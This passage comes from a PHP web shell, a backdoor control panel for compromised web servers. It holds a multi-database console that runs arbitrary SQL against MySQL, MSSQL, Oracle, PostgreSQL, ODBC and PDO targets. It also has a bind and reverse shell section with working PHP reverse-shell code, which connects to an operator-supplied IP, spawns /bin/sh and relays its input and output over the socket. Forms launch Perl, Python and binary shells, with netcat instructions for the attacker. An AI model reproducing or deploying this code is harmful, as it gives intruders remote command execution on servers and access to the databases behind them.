764.                   }
765.                 }
766.             }
767.             else $sqls = "SHOW databases;";
768.  
769.             $s_result .= "  <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
770.                     <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
771.                     <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
772.                     <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
773.                     <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
774.                     <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
775.                     <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
776.                     <p><input type=\"submit\" name=\"mysqlcon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
777.                     &nbsp;&nbsp;Separate multiple commands with a semicolon  <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
778.                     </form>";
779.             $s_result .= "<div>".$q_result."</div>";
780.             if($con) mysql_close($con);
781.         }
782.         elseif(isset($_REQUEST['mssqlcon']) && ($con = mssql_connect($hostandport,$sqluser,$sqlpass))){
783.             if(isset($_REQUEST['sqlcode'])){
784.                 $sqls = ss($_REQUEST['sqlcode']);
785.                 $querys = explode(";",$sqls);
786.  
787.                 foreach($querys as $query){
788.                   if(trim($query) != ""){
789.                     $hasil = mssql_query($query);
790.                     if($hasil){
791.                         $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
792.                         <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
793.                         <table class=\"explore\" style=\"width:99%;\"><tr>";
794.                         for($i=0;$i<mssql_num_fields($hasil);$i++)
795.                             $q_result .= "<th>".htmlspecialchars(mssql_field_name($hasil,$i))."</th>";
796.                         $q_result .= "</tr>";
797.                         while($rows=mssql_fetch_array($hasil)){
798.                             $q_result .= "<tr>";
799.                             for($j=0;$j<mssql_num_fields($hasil);$j++)
800.                             {
801.                                 if($rows[$j] == "") $dataz = " ";
802.                                 else $dataz = $rows[$j];
803.                                 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
804.                             }
805.                             $q_result .= "</tr>";
806.                         }
807.                         $q_result .= "</table>";
808.                     }
809.                     else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
810.                             <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
811.                   }
812.                 }
813.             }
814.             else $sqls = "EXEC sp_databases;";
815.  
816.             $s_result .= "  <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
817.                     <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
818.                     <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
819.                     <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
820.                     <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
821.                     <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
822.                     <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
823.                     <p><input type=\"submit\" name=\"mssqlcon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
824.                     &nbsp;&nbsp;Separate multiple commands with a semicolon  <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
825.                     </form>";
826.             $s_result .= "<div>".$q_result."</div>";
827.             if($con) mssql_close($con);
828.         }
829.         elseif(isset($_REQUEST['oraclecon']) && ($con = oci_connect($sqluser,$sqlpass,$hostandport))){
830.             if(isset($_REQUEST['sqlcode'])){
831.                 $sqls = ss($_REQUEST['sqlcode']);
832.                 $querys = explode(";",$sqls);
833.  
834.                 foreach($querys as $query){
835.                   if(trim($query) != ""){
836.                     $st = oci_parse($con, $query);
837.                     if(oci_execute($st)){
838.                         $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
839.                         <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
840.                         <table class=\"explore\" style=\"width:99%;\"><tr>";
841.                         for($i=1;$i<=oci_num_fields($st);$i++)
842.                             $q_result .= "<th>".htmlspecialchars(oci_field_name($st,$i))."</th>";
843.                    
844.                         $q_result .= "</tr>";
845.                    
846.                         while($rows=oci_fetch_array($st)){
847.                             $q_result .= "<tr>";
848.                             for($j=0;$j<oci_num_fields($st);$j++)
849.                             {
850.                                 if($rows[$j] == "") $dataz = " ";
851.                                 else $dataz = $rows[$j];
852.                                 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
853.                             }
854.                             $q_result .= "</tr>";
855.                         }
856.                         $q_result .= "</table>";
857.                     }
858.                     else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
859.                             <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
860.                   }
861.                 }
862.             }
863.             else $sqls = "SELECT * FROM user_tablespaces;";
864.  
865.             $s_result .= "  <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
866.                     <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
867.                     <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
868.                     <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
869.                     <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
870.                     <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
871.                     <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
872.                     <p><input type=\"submit\" name=\"oraclecon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
873.                     &nbsp;&nbsp;Separate multiple commands with a semicolon  <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
874.                     </form>";
875.             $s_result .= "<div>".$q_result."</div>";
876.             if($con) oci_close($con);
877.         }
878.         elseif(isset($_REQUEST['pgsqlcon']) && ($con = pg_connect("host=$sqlhost user=$sqluser password=$sqlpass port=$sqlport"))){
879.             if(isset($_REQUEST['sqlcode'])){
880.                 $sqls = ss($_REQUEST['sqlcode']);
881.                 $querys = explode(";",$sqls);
882.  
883.                 foreach($querys as $query){
884.                   if(trim($query) != ""){
885.                     $hasil = pg_query($query);
886.                     if($hasil){
887.                         $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
888.                         <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
889.                         <table class=\"explore\" style=\"width:99%;\"><tr>";
890.                         for($i=0;$i<pg_num_fields($hasil);$i++)
891.                             $q_result .= "<th>".htmlspecialchars(pg_field_name($hasil,$i))."</th>";
892.                         $q_result .= "</tr>";
893.                    
894.                         while($rows=pg_fetch_array($hasil)){
895.                             $q_result .= "<tr>";
896.                             for($j=0;$j<pg_num_fields($hasil);$j++)
897.                             {
898.                                 if($rows[$j] == "") $dataz = " ";
899.                                 else $dataz = $rows[$j];
900.                                 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
901.                             }
902.                             $q_result .= "</tr>";
903.                         }
904.                         $q_result .= "</table>";
905.                     }
906.                     else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
907.                             <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
908.                   }
909.                 }
910.             }
911.         }
912.         elseif(isset($_REQUEST['odbccon']) && ($con = odbc_connect($odbcdsn,$odbcuser,$odbcpass))){
913.             if(isset($_REQUEST['sqlcode'])){
914.                 $sqls = ss($_REQUEST['sqlcode']);
915.                 $querys = explode(";",$sqls);
916.  
917.                 foreach($querys as $query){
918.                   if(trim($query) != ""){
919.                     $hasil = odbc_exec($con, $query);
920.                     if($hasil){
921.                         $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
922.                         <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
923.                         <table class=\"explore\" style=\"width:99%;\"><tr>";
924.                         for($i=1;$i<=odbc_num_fields($hasil);$i++)
925.                             $q_result .= "<th>".htmlspecialchars(odbc_field_name($hasil,$i))."</th>";
926.                         $q_result .= "</tr>";
927.                    
928.                         while($rows=odbc_fetch_array($hasil)){
929.                             $q_result .= "<tr>";
930.                             foreach($rows as $r)
931.                             {
932.                                 if($r == "") $dataz = " ";
933.                                 else $dataz = $r;
934.                                 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
935.                             }
936.                             $q_result .= "</tr>";
937.                         }
938.                         $q_result .= "</table>";
939.                     }
940.                     else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
941.                             <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
942.                   }
943.                 }
944.             }      
945.             else $sqls = "";
946.  
947.             $s_result .= "  <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
948.                     <input type=\"hidden\" name=\"odbcdsn\" value=\"".$odbcdsn."\" />
949.                     <input type=\"hidden\" name=\"odbcuser\" value=\"".$odbcuser."\" />
950.                     <input type=\"hidden\" name=\"odbcpass\" value=\"".$odbcpass."\" />
951.                     <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
952.                     <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
953.                     <p><input type=\"submit\" name=\"odbccon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
954.                     &nbsp;&nbsp;Separate multiple commands with a semicolon  <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
955.                     </form>";
956.             $s_result .= "<div>".$q_result."</div>";
957.             if($con) odbc_close($con);
958.         }
959.         else{
960.             if(isset($_REQUEST['pdocon'])){
961.                 try{
962.                     // create object
963.                     $mypdo = new PDO($pdodsn,$pdouser,$pdopass);       
964.                     if(isset($_REQUEST['sqlcode'])){
965.                         $sqls = ss($_REQUEST['sqlcode']);
966.                         $querys = explode(";",$sqls);
967.  
968.                         foreach($querys as $query){
969.                             if(trim($query) != ""){
970.  
971.                                 if($hasil = $mypdo->query($query)){
972.                                     $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
973.                                     <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
974.                                     <table class=\"explore\" style=\"width:99%;\"><tr>";
975.                                     // workaround to get column name
976.                                     $r = $hasil->fetch(PDO::FETCH_ASSOC);
977.                                     $savefirstrow = array();
978.                                     foreach($r as $fn=>$fv){
979.                                         $q_result .= "<th>".htmlspecialchars($fn)."</th>";
980.                                         $savefirstrow[] = $fv;
981.                                     }
982.                                     $q_result .= "</tr><tr>";
983.                                     foreach($savefirstrow as $fv){
984.                                         $q_result .= "<td>".htmlspecialchars($fv)."</td>";
985.                                     }
986.                                     $q_result .= "</tr>";
987.                                     while($rows = $hasil->fetch(PDO::FETCH_ASSOC)){
988.                                         $q_result .= "<tr>";
989.                                         foreach($rows as $r)
990.                                         {
991.                                             if($r == "") $dataz = " ";
992.                                             else $dataz = $r;
993.                                             $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
994.                                         }
995.                                         $q_result .= "</tr>";
996.                                     }  
997.                                     $q_result .= "</table>";   
998.                                 }
999.                                 else{
1000.  
1001.                                     $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
1002.                                             <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1003.                                 }
1004.  
1005.                                 $q_result .= "</table>";
1006.                             }
1007.                         }
1008.                     }      
1009.                     else $sqls = "";
1010.                
1011.                     $s_result .= "  <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1012.                         <input type=\"hidden\" name=\"pdodsn\" value=\"".$pdodsn."\" />
1013.                         <input type=\"hidden\" name=\"pdouser\" value=\"".$pdouser."\" />
1014.                         <input type=\"hidden\" name=\"pdopass\" value=\"".$pdopass."\" />
1015.                         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1016.                         <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
1017.                         <p><input type=\"submit\" name=\"pdocon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1018.                         &nbsp;&nbsp;Separate multiple commands with a semicolon  <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1019.                         </form>";
1020.                         $s_result .= "<div>".$q_result."</div>";               
1021.                 }  
1022.                 catch (PDOException $uck) {
1023.                     die();
1024.                 }          
1025.             }
1026.             else{
1027.                 // mysql
1028.                 $s_result .= "<div class=\"mybox\"><h2>connect to MySQL</h2>
1029.                 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1030.                 <table class=\"myboxtbl\">
1031.                 <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost1\" value=\"".$sqlhost1."\" /></td></tr>
1032.                 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser1\" value=\"".$sqluser1."\" /></td></tr>
1033.                 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass1\" value=\"\" /></td></tr>
1034.                 <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport1\" value=\"".$sqlport1."\" /></td></tr>
1035.                 </table>
1036.                 <input type=\"submit\" name=\"mysqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1037.                 </form>
1038.                 </div>";
1039.                 // mssql
1040.                 $s_result .= "<div class=\"mybox\"><h2>connect to MsSQL</h2>
1041.                 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1042.                 <table class=\"myboxtbl\">
1043.                 <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost2\" value=\"".$sqlhost2."\" /></td></tr>
1044.                 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser2\" value=\"".$sqluser2."\" /></td></tr>
1045.                 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass2\" value=\"\" /></td></tr>
1046.                 <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport2\" value=\"".$sqlport2."\" /></td></tr>
1047.                 </table>
1048.                 <input type=\"submit\" name=\"mssqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1049.                 </form>
1050.                 </div>";
1051.  
1052.                 // postgresql
1053.                 $s_result .= "<div class=\"mybox\"><h2>connect to PostgreSQL</h2>
1054.                 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1055.                 <table class=\"myboxtbl\">
1056.                 <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost3\" value=\"".$sqlhost3."\" /></td></tr>
1057.                 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser3\" value=\"".$sqluser3."\" /></td></tr>
1058.                 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass3\" value=\"\" /></td></tr>
1059.                 <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport3\" value=\"".$sqlport3."\" /></td></tr>
1060.                 </table>
1061.                 <input type=\"submit\" name=\"pgsqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1062.                 <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1063.                 </form>
1064.                 </div>";
1065.  
1066.                 // oracle
1067.                 $s_result .= "<div class=\"mybox\"><h2>connect to Oracle</h2>
1068.                 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1069.                 <table class=\"myboxtbl\">
1070.                 <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost4\" value=\"".$sqlhost4."\" /></td></tr>
1071.                 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser4\" value=\"".$sqluser4."\" /></td></tr>
1072.                 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass4\" value=\"\" /></td></tr>
1073.                 <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport4\" value=\"".$sqlport4."\" /></td></tr>
1074.                 </table>
1075.                 <input type=\"submit\" name=\"oraclecon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1076.                 <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1077.                 </form>
1078.                 </div>";
1079.                        
1080.                 // odbc
1081.                 $s_result .= "<div class=\"mybox\"><h2>connect using ODBC</h2>
1082.                 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1083.                 <table class=\"myboxtbl\">
1084.                 <tr><td style=\"width:120px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcdsn\" value=\"".$odbcdsn."\" /></td></tr>
1085.                 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcuser\" value=\"".$odbcuser."\" /></td></tr>
1086.                 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"odbcpass\" value=\"\" /></td></tr>
1087.                 </table>
1088.                 <input type=\"submit\" name=\"odbccon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1089.                 <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1090.                 </form>
1091.                 </div>";
1092.                        
1093.                 // pdo
1094.                 $s_result .= "<div class=\"mybox\"><h2>connect using PDO</h2>
1095.                 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1096.                 <table class=\"myboxtbl\">
1097.                 <tr><td style=\"width:120px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdodsn\" value=\"".$pdodsn."\" /></td></tr>
1098.                 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdouser\" value=\"".$pdouser."\" /></td></tr>
1099.                 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"pdopass\" value=\"\" /></td></tr>
1100.                 </table>
1101.                 <input type=\"submit\" name=\"pdocon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1102.                 <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1103.                 </form>
1104.                 </div>";
1105.             }
1106.         }
1107.     } // bind and reverse shell
1108.     elseif(isset($_REQUEST['rs'])){
1109.         $rshost = $s_server_ip;
1110.         $rstarget = "";
1111.         $d = $pwd;
1112.         if(isset($_REQUEST['d'])) $d = ss($_REQUEST['d']);
1113.  
1114.         $rsport = "13123";
1115.         // resources $xback_pl $xbind_pl $xback_c $xbind_c $xmulti_py $wmulti_c
1116.         $rspesan = "Press &#39;  Go !  &#39; button and run &#39;  nc <i>server_ip</i> <i>port</i>  &#39; on your computer";
1117.         $rspesanb = "Run &#39;  nc -l -v -p <i>port</i>  &#39; on your computer and press &#39;  Go !  &#39; button";
1118.  
1119.         $rsport1 = $rsport;
1120.         $rsport2 = $rsport;
1121.         $rsport3 = $rsport;
1122.  
1123.         if(isset($_REQUEST['xbind_pl'])){
1124.             if(isset($_REQUEST['sqlport1'])) $rsport1 = ss($_REQUEST['sqlport1']);
1125.             $rstarget = $rsport1;
1126.             $rsres = rs($s_win, cp($d),  "xbind_pl" ,$xbind_pl, $rstarget);
1127.             $s_result .= $rsres;
1128.         }
1129.         if(isset($_REQUEST['xbind_py'])){
1130.             if(isset($_REQUEST['sqlport2'])) $rsport2 = ss($_REQUEST['sqlport2']);
1131.             $rstarget = $rsport2;
1132.             $rsres = rs($s_win, cp($d),  "xbind_py" ,$xmulti_py, $rstarget);
1133.             $s_result .= $rsres;
1134.         }
1135.         if(isset($_REQUEST['xbind_bin'])){
1136.             if(isset($_REQUEST['sqlport3'])) $rsport3 = ss($_REQUEST['sqlport3']);
1137.             $rstarget = $rsport3;
1138.             if(!$s_win) $rsres = rs($s_win, cp($d),  "xbind_bin" ,$xbind_c, $rstarget);
1139.             else $rsres = rs($s_win, cp($d),  "xbind_bin" ,$wmulti_c, $rstarget);
1140.             $s_result .= $rsres;
1141.         }
1142.  
1143.         $rsportb1 = $rsport;
1144.         $rsportb2 = $rsport;
1145.         $rsportb3 = $rsport;
1146.         $rsportb4 = $rsport;
1147.         $rstarget1 = $s_my_ip;
1148.         $rstarget2 = $s_my_ip;
1149.         $rstarget3 = $s_my_ip;
1150.         $rstarget4 = $s_my_ip;
1151.  
1152.         if(isset($_REQUEST['xback_pl'])){
1153.             if(isset($_REQUEST['sqlportb1'])) $rsportb1 = ss($_REQUEST['sqlportb1']);
1154.             if(isset($_REQUEST['rstarget1'])) $rstarget1 = ss($_REQUEST['rstarget1']);
1155.  
1156.             $rstarget = $rsportb1."  ".$rstarget1;
1157.             $rsres = rs($s_win, cp($d),  "xback_pl" ,$xback_pl, $rstarget);
1158.             $s_result .= $rsres;
1159.  
1160.         }
1161.         if(isset($_REQUEST['xback_py'])){
1162.             if(isset($_REQUEST['sqlportb2'])) $rsportb2 = ss($_REQUEST['sqlportb2']);
1163.             if(isset($_REQUEST['rstarget2'])) $rstarget2 = ss($_REQUEST['rstarget2']);
1164.  
1165.             $rstarget = $rsportb2."  ".$rstarget2;
1166.             $rsres = rs($s_win, cp($d),  "xback_py" ,$xmulti_py, $rstarget);
1167.             $s_result .= $rsres;
1168.         }
1169.         if(isset($_REQUEST['xback_bin'])){
1170.             if(isset($_REQUEST['sqlportb3'])) $rsportb3 = ss($_REQUEST['sqlportb3']);
1171.             if(isset($_REQUEST['rstarget3'])) $rstarget3 = ss($_REQUEST['rstarget3']);
1172.  
1173.             $rstarget = $rsportb3."  ".$rstarget3;
1174.             if(!$s_win) $rsres = rs($s_win, cp($d),  "xback_bin" ,$xback_c, $rstarget);
1175.             else $rsres = rs($s_win, cp($d),  "xback_bin" ,$wmulti_c, $rstarget);
1176.             $s_result .= $rsres;
1177.         }
1178.         if(isset($_REQUEST['xback_php'])){
1179.             if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
1180.             if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
1181.                 $ip = $rstarget4;
1182.                 $port = $rsportb4;
1183.                 $chunk_size = 1337;
1184.                 $write_a = null;
1185.                 $error_a = null;
1186.                 $shell = '/bin/sh';
1187.                 $daemon = 0;
1188.                 $debug = 0;
1189.                 if(function_exists('pcntl_fork')){
1190.                     $pid = pcntl_fork();
1191.                     if ($pid == -1) exit(1);
1192.                     if ($pid) exit(0);
1193.                     if (posix_setsid() == -1) exit(1);
1194.                     $daemon = 1;
1195.                 }
1196.                 umask(0);
1197.                 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
1198.                 if(!$sock) exit(1);
1199.                 $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
1200.                 $process = proc_open($shell, $descriptorspec, $pipes);
1201.                 if(!is_resource($process)) exit(1);
1202.                 stream_set_blocking($pipes[0], 0);
1203.                 stream_set_blocking($pipes[1], 0);
1204.                 stream_set_blocking($pipes[2], 0);
1205.                 stream_set_blocking($sock, 0);
1206.                 while(1){
1207.                     if(feof($sock)) break;
1208.                     if(feof($pipes[1])) break;
1209.                     $read_a = array($sock, $pipes[1], $pipes[2]);
1210.                     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
1211.                     if(in_array($sock, $read_a)){
1212.                         $input = fread($sock, $chunk_size);
1213.                         fwrite($pipes[0], $input);
1214.                     }
1215.                     if(in_array($pipes[1], $read_a)){
1216.                         $input = fread($pipes[1], $chunk_size);
1217.                         fwrite($sock, $input);
1218.                     }
1219.                     if(in_array($pipes[2], $read_a)){
1220.                         $input = fread($pipes[2], $chunk_size);
1221.                         fwrite($sock, $input);
1222.                     }
1223.                 }
1224.                 fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);
1225.                 proc_close($process);
1226.             $rsres = " ";
1227.             $s_result .= $rsres;
1228.         }
1229.         $s_result .= "<div class=\"mybox\"><h2>Bind shell ( perl )</h2>
1230.         <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1231.         <table class=\"myboxtbl\">
1232.         <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost1\" value=\"".$rshost."\" /></td></tr>
1233.         <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport1\" value=\"".$rsport1."\" /></td></tr>
1234.         </table>
1235.         <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1236.         &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
1237.         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1238.         </form>
1239.         </div>";
1240.         $s_result .= "<div class=\"mybox\"><h2>Bind shell ( python )</h2>
1241.         <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1242.         <table class=\"myboxtbl\">
1243.         <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost\" value=\"".$rshost."\" /></td></tr>
1244.         <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport2\" value=\"".$rsport2."\" /></td></tr>
1245.         </table>
1246.         <input type=\"submit\" name=\"xbind_py\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1247.         &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
1248.         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1249.         </form>
1250.         </div>";
1251.         $s_result .= "<div class=\"mybox\"><h2>Bind shell ( bin )</h2>
1252.         <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1253.         <table class=\"myboxtbl\">
1254.         <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost\" value=\"".$rshost."\" /></td></tr>
1255.         <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport3\" value=\"".$rsport3."\" /></td></tr>
1256.         </table>
1257.         <input type=\"submit\" name=\"xbind_bin\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1258.         &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
1259.         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1260.         </form>
1261.         </div>";
1262.         $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( perl )</h2>
1263.         <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1264.         <table class=\"myboxtbl\">
1265.         <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget1\" value=\"".$rstarget1."\" /></td></tr>
1266.         <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb1\" value=\"".$rsportb1."\" /></td></tr>
1267.         </table>
1268.         <input type=\"submit\" name=\"xback_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1269.         &nbsp;&nbsp;<span id=\"rs1\">".$rspesanb."</span>
1270.         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1271.         </form>
1272.         </div>";
1273.         $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( python )</h2>
1274.         <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1275.         <table class=\"myboxtbl\">
1276.         <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget2\" value=\"".$rstarget2."\" /></td></tr>
1277.         <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb2\" value=\"".$rsportb2."\" /></td></tr>
1278.         </table>
1279.         <input type=\"submit\" name=\"xback_py\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1280.         &nbsp;&nbsp;<span id=\"rs1\">".$rspesanb."</span>
1281.         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1282.         </form>
1283.         </div>";
